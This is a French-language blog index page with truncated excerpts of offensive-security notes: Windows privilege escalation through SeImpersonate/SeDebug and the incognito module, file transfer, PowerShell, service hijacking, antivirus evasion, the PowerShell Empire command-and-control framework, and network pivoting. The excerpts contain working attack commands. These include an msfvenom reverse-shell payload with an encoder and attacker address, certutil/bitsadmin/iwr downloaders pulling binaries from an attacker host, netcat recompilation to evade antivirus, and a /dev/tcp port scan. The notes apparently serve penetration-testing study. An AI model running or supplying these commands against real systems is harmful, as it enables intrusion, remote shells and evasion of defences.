Exploitation des privilèges SeDebugPrivilege, SeImpersonatePrivilege

Si on se rend compte que nous avons les privilèges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous créer le code initial pour avoir une session meterpreter msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe Téléchargement du code sudo python -m http.server … Continuer la lecture

Transfert de fichiers

Avec Windows powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe ” certutil -urlcache -f http://192.168.1.2/putty.exe putty.exe bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe C:\Temp\putty.exe curl http://192.168.1.2/putty.exe -o putty.exe wget http://192.168.1.2/putty.exe -OutFile putty.exe powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://192.168.1.2/putty.exe’, ‘putty.exe’) impacket-smbserver share $(pwd) -smb2support tftp use auxiliary/server/tftp set srvhost 10.9.0.24 set tftproot /home/r0cker exploit tftp -i 192.168.1.2 GET file.txt #sur l<ordinateur de la … Continuer la lecture

Aide sur les commandes principales de Powershell

powershell -ExecutionPolicy Bypass -File .\myscript.ps1 Get-Help Command-Name Get-Help Get-Command -Examples Get-Command Verb-* ou Get-Command *-Noun #recherche de cmdlets Manipulation d’objets le Pipe permet de passer un objet à un autre cmdlet Verb-Noun | Get-Member ex. Get-Command | Get-Member -MemberType Method #retrouve les méthodes d’une cmdlet ex. (Get-Command Get-ChildItem).Parameter #retrouve les paramètres d’une cmdlet Get-ChildItem | … Continuer la lecture

Service sous windows

Trouve les services qui ne sont pas ceux de Windows wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows" Quel est l’usager exécutant un service sc qc SERVICE_NAME Vérification si on peut écrire dans un répertoire powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list" Remplacement d’un service par un autre (exploit) Wrapper.cs using System; … Continuer la lecture

Évasion anti-virus

Obfuscation de code PHP https://www.gaijin.at/en/tools/php-obfuscator Recompilation de netcat git clone https://github.com/int0x33/nc.exe/ sudo apt install mingw-w64 changer le compilateur dans le Makefile par CC=x86_64-w64-mingw32-gcc make 2>/dev/null

Command and control framework

Liste de framework disponible Cobalt Strike (Payant) Covenant Merlin Shadow PoshC2 powershell empire Nous nous attarderons ici à powershell empire sudo apt install powershell-empire starkiller #installation. starkiller est l'interface web. https://localhost:1337. empireadmin/password123 sudo powershell-empire server #fichier de configuration dans /usr/share/powershell-empire/empire/client/config.yaml powershell-empire client uselistener http set Name CLIHTTP set Host Host 10.9.0.60 #notre adresse IP set … Continuer la lecture

Pivot avec ssh, plink, socat, chisel ou sshuttle

Pivoter Enumeration des hôtes actifs ./nmap -sn 10.x.x.1-255 -oN scan-USERNAME for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done #alternative Détermination des ports actifs sur un hôtes for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done Configuration de proxychains Les fichiers de … Continuer la lecture